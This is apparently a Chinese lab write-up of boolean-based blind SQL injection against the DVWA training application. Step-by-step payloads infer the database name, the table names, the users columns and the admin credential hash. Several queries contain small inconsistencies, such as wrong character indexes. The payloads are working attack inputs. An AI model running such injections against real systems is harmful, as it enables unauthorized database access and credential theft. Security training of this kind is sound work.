1.判断注入点
1 exists
1' missing
(以下的图片同上,不过多陈述)
2.判断类型
1 and 1=1# exists
1 and 1=2# exists
不是数字型
1' and 1=1# exists
1' and 1=2# missing
是字符型
3.爆数据库名
(1)爆数据库名的长度
1' and length(database())>10# missing
1' and length (database ())>5# missing
1' and length(database())>3# exists
1' and length(database())=4# exists
(2)猜解数据库名的组成字符
第1个字符
1' and ascii(substr(database(),1,1))>108# missing
1' and ascii(substr(database(),1,1))>102# missing
1' and ascii(substr(database(),1,1))>99# exists
1' and ascii(substr(database(),1,1))=100# exists
说明第一个字符的ascii码为100,是d
第2个字符
1' and ascii(substr(database(),2,1))>108# exists
1' and ascii(substr(database(),2,1))>150# missing
1' and ascii(substr(database(),1,1))=118# exists
是v
第3个字符
1' and ascii(substr(database(),1,1))=119# exists
是w
第4个字符
1' and ascii(substr(database(),1,1))=97# exists
是a
所以数据库名是'dvwa'
4.爆数据表
(1)猜解数据库的表的个数
1' and (select count(table_name) from information_schema.tables where table_schema ='dvwa')>5# missing
1' and (select count(table_name) from information_schema.tables where table_schema ='dvwa')>3# missing
1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2# exists
2个表
(2)猜解数据库的表名的字符长度
第1个表
第1个表的字符长度
1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))>10# missing
1' and length(substr((select table_name from information_schema.tables where table_schema ='dvwa' limit 0,1),1))=9# exists
第1个表的字符长度为9
第2个表
第2个表的字符长度
1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5# exists
第1个表的字符长度为5
猜解数据库的表名的组成字符
第1个表
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>108 # missing
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 # exists
说明第一个字符的ascii码为103,是g
依次猜解出其他位置的字符分别为:u、e、s、t、b、o、o、k
所以第1个表的名称为:guestbook
第2个表
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>108 # exists
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=117 # exists
说明第一个字符的ascii码为117,是u
依次猜解出其他位置的字符分别为:s、e、r、s
所以第2个表的名称为:users
5.爆字段名
(1)猜解users表中的字段数目
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8 # exists
所以users表中有8个字段
猜解users表中的各个字段的名称
1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 # exists
1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 # exists
users表中存在字段user和password
(1)1' and length(substr((select user from users limit 0,1),1))=5 # exists
user字段中第1个字段值的字符长度=5
1' and length(substr((select password from users limit 0,1),1))=32 # exists
password字段中第1个字段值的字符长度=32
猜测用来md5的加密方式保存
user |
password |
md5($password) |
admin |
password |
5f4dcc3b5aa765d61d8327deb882cf99 |
1' and substr((select user from users limit 0,1),1)='admin' # exits
1' and (select count(*) from users where user='admin')=1 # exits
1' and (select count(*) from users where user='admin' and password='5f4dcc3b5aa765d61d8327deb882cf99')=1 # exists
所以用户名和密码user,password字段的第1组取值:admin和password